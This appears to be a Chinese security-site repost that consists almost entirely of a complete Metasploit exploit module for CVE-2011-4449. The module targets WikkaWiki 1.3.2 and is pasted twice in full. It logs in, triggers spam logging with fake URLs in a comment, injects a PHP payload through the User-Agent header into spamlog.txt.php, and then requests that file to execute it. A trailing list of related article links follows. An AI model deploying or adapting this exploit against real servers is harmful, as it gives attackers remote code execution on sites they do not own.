WikkaWiki 1.3.2 Spam Logging PHP注射的方法
发布时间:2012-05-14 12:03:08 作者:佚名 
我要评论
我要评论WikkaWiki 1.3.2 Spam Logging PHP注射的详细方法代码
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
'Description' => %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).
Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new('PASSWORD', [true, 'WikkaWiki password']),
OptString.new('PAGE', [true, 'Page to inject']),
OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})
if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})
# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not continue"
end
cookie
end
#
# Do login, and then return the cookie that contains our credential
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
# Extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
end
# Add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = 'on'
login['submit'] = "Login"
login['confpassword'] = ''
login['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})
if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
end
return cookie_cred
end
#
# After login, we inject the PHP payload
#
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
end
# Generate enough URLs to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end
# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie")
cookie = get_cookie
print_status("#{@peer} - Logging in")
cred = login(cookie)
print_status("#{@peer} - Triggering spam logging")
inject_exec(cred)
handler
end
end
=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_logging' => '1'
=end
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
'Description' => %q{
This module exploits a vulnerability found in WikkaWiki. When the spam logging
feature is enabled, it is possible to inject PHP code into the spam log file via the
UserAgent header , and then request it to execute our payload. There are at least
three different ways to trigger spam protection, this module does so by generating
10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).
Please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'PAGE'.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4449'],
['OSVDB', '77391'],
['EDB', '18177'],
['URL', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Arch' => ARCH_PHP,
'Platform' => ['php'],
'Targets' =>
[
['WikkaWiki 1.3.2 r1814', {}]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2011",
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'WikkaWiki username']),
OptString.new('PASSWORD', [true, 'WikkaWiki password']),
OptString.new('PAGE', [true, 'Page to inject']),
OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
})
if res and res.body =~ /Powered by WikkaWiki/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Get the cookie before we do any of that login/exploity stuff
#
def get_cookie
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php"
})
# Get the cookie in this format:
# 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
raise RuntimeError, "#{@peer} - No cookie found, will not continue"
end
cookie
end
#
# Do login, and then return the cookie that contains our credential
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
uri = "#{@base}wikka.php?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
})
# Extract the hidden fields
login = {}
if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
fields = $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/)
fields.each do |name, value|
login[name] = value
end
else
raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
end
# Add the rest of fields required for login
login['action'] = 'login'
login['name'] = datastore['USERNAME']
login['password'] = datastore['PASSWORD']
login['do_redirect'] = 'on'
login['submit'] = "Login"
login['confpassword'] = ''
login['email'] = ''
port = (rport.to_i == 80) ? "" : ":#{rport}"
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },
'vars_post' => login
})
if res and res.headers['Set-Cookie'] =~ /user_name/
user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
end
return cookie_cred
end
#
# After login, we inject the PHP payload
#
def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
fields = {}
if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
$1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
fields[n] = v
end
else
raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
end
# Generate enough URLs to trigger spam logging
urls = ''
10.times do |i|
urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'org', 'us', 'info'].sample}\n"
end
# Add more fields
fields['body'] = urls
fields['submit'] = 'Add'
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
post_data = ""
send_request_cgi({
'method' => 'POST',
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
'agent' => "<?php #{payload.encoded} ?>"
})
send_request_raw({
'method' => 'GET',
'uri' => "#{@base}spamlog.txt.php"
})
end
def exploit
@peer = "#{rhost}:#{rport}"
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie")
cookie = get_cookie
print_status("#{@peer} - Logging in")
cred = login(cookie)
print_status("#{@peer} - Triggering spam logging")
inject_exec(cred)
handler
end
end
=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_logging' => '1'
=end
相关文章
- 很多游戏服务器租用的时候会出现一些封UDP的字眼,网上一些文章也说UDP协议不可靠!为什么要封UDP呢?既然不可靠,为什么有些人还要使用它呢?今天与你们分享一下UDP,希望2024-05-07
- 魔兽世界服务器被攻击在目前来说也是比较常见的,同行竞争激烈,在官服开放时也遇到过DDOS攻击,要是飞飞没记错是在22年9月14日,从刚开始的身份验证服务器出现问题,到确2023-07-17
- 这篇文章主要分享一下五大免费企业网络入侵检测(IDS)工具,当前企业对于网络安全越来越重视,那么后期可能就需要大家多多关注一些安全工具的使用于检测2019-12-01
网络协议是什么呢?网络协议是网络中计算机或设备之间进行通信的一系列规则集合。本文中小编介绍的是网络协议和安全威胁的关系,需要的朋友不妨阅读本文了解一下2019-04-02
DDoS攻击是由DoS攻击转化的,这项攻击的原理以及表现形式是怎样的呢?要如何的进行防御呢?本文中将会有详细的介绍,需要的朋友不妨阅读本文进行参考2019-01-15
本文中介绍的是基于Web攻击的方式发现并攻击物联网设备,感兴趣的朋友不妨阅读本文进行了解2019-01-11
起首说说挟制路由器是什么意思,路由器挟制平日指的是,开启了无线网络功效的无线路由器,攻击者经由过程破解无线暗码衔接上无线网后,再登录路由治理界面来节制全部无线网2018-05-16
大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设
这篇文章主要介绍了大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解,,小编觉得还是挺不错的,具有一定借鉴价值,下面就来和小编一起看看2018-01-25
详细介绍sd卡加密软件的选择以及给sd卡设置密码、给sd卡加密
这篇文章主要介绍了详细介绍sd卡加密软件的选择以及给sd卡设置密码、给sd卡加密,如何保护sd卡文件的安全,如何给SD卡设置密码、如何给SD卡加密,下面就跟小编一起来看看吧2018-01-19
server2008共享设置、服务器共享文件设置、服务器设置共享文件夹的方法
这篇文章主要介绍了server2008共享设置、服务器共享文件设置、服务器设置共享文件夹的方法详细介绍,保护服务器共享文件设置访问权限,让每个部门只访问自己的共享文件等,2018-01-19
最新评论